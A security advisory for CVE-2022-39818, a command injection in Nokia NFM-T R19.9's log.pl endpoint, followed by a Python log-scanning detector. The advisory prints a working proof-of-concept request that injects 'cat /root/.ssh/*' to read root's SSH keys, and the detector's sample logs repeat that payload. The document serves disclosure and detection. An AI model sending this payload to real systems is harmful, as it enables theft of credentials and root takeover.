CVE-2022-39818 – NOKIA NFM-T VM Manager WebUI

Vulnerability Description: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') – CWE-78

Software Version: R19.9

NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39818

CVSSv3: 8.8

Severity: High

Credits: Luca Di Giuseppe, Alessandro Bosco, Stefano Scipioni, Massimiliano Brolli

The Web application does not properly check the parameters sent as input before they are processed on the server side. This allows any authenticated user to execute commands on the Operating System.

Step-by-step instructions and PoC

The Web application, and more precisely the module that manages the VM element (qemu WebUI), does not properly check the parameters sent as input before they are processed on the server. This lack of input validation allows an attacker to replace the intended command and inject arbitrary system commands, which run with the root privileges of the application user.

Affected Endpoints

· URL: https://[...]/cgi-bin/R19.9/log.pl

Parameter:

· HTTP GET: cmd

Below is the evidence with the vulnerability details and the payload used.

Payload used to exploit the vulnerability:

GET /cgi-bin/R19.9/log.pl?go=OK&bench=KALEVO19&c=22SHOWCA&runfrom=/var/autoinstall/R19.9&cmd=cat%20/root/.ssh/* HTTP/1.1
Host: [...]
Cookie: XSRF=618627
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept-Encoding: gzip, deflate
Authorization: Basic [...]
Referer: https://[...]/cgi-bin/R19.9/actions.pl?session=KALEVO19
Connection: close

This first step consists of replacing the command in the “cmd” GET parameter with the chosen one, so that the server executes it:

Then, if needed, the output of the command can be read in the log file specified in the previous request, “/tmp/.AIClogger-KALEVO19-log12065.log”:

Security Impact

By exploiting the lack of validation mechanisms in the Web app, it was possible, through the execution of arbitrary commands, to obtain a shell for remote control of the endpoint with root privileges.
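As an added detection example (not part of the advisory or of the vendor's code), the following Python snippet scans web-server access-log lines for requests to the log.pl endpoint whose percent-decoded cmd parameter contains whitespace or shell metacharacters, which is how the payload above would show up in logs. The sample log lines and the benign value SHOWLOG are constructed assumptions.

```python
"""Detection sketch for CVE-2022-39818: flag access-log requests to the
vulnerable log.pl endpoint whose decoded 'cmd' value looks like a shell command."""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameter named in the advisory.
VULN_PATH = "/cgi-bin/R19.9/log.pl"
PARAM = "cmd"

# Decoded cmd values containing whitespace, shell metacharacters, path
# separators or globs are flagged. Assumption: a legitimate value is a bare token.
SUSPICIOUS = re.compile(r"""[\s;&|`$<>(){}\\/*?'"]""")

# Constructed sample access-log lines (common log format), not from the advisory.
# Line 2 carries the payload shown in the advisory; SHOWLOG is a made-up benign value.
SAMPLE_LOG = """\
10.0.0.5 - admin [01/Mar/2023:10:00:01 +0000] "GET /cgi-bin/R19.9/log.pl?go=OK&bench=KALEVO19&cmd=SHOWLOG HTTP/1.1" 200 512
10.0.0.7 - admin [01/Mar/2023:10:00:09 +0000] "GET /cgi-bin/R19.9/log.pl?go=OK&bench=KALEVO19&runfrom=/var/autoinstall/R19.9&cmd=cat%20/root/.ssh/* HTTP/1.1" 200 2048
10.0.0.9 - admin [01/Mar/2023:10:00:15 +0000] "GET /cgi-bin/R19.9/actions.pl?session=KALEVO19 HTTP/1.1" 200 128
"""

REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

def suspicious_cmd(target):
    """Return the decoded cmd value if the request targets log.pl with shell-like content, else None."""
    parts = urlsplit(target)
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes, so %20 becomes a real space before matching.
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        if SUSPICIOUS.search(value):
            return value
    return None

def scan(log_text):
    """Return (source_ip, user, timestamp, decoded_cmd) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        cmd = suspicious_cmd(m["target"])
        if cmd is not None:
            hits.append((m["src"], m["user"], m["ts"], cmd))
    return hits

if __name__ == "__main__":
    for src, user, ts, cmd in scan(SAMPLE_LOG):
        print(f"{ts} {src} user={user} cmd={cmd!r}")
```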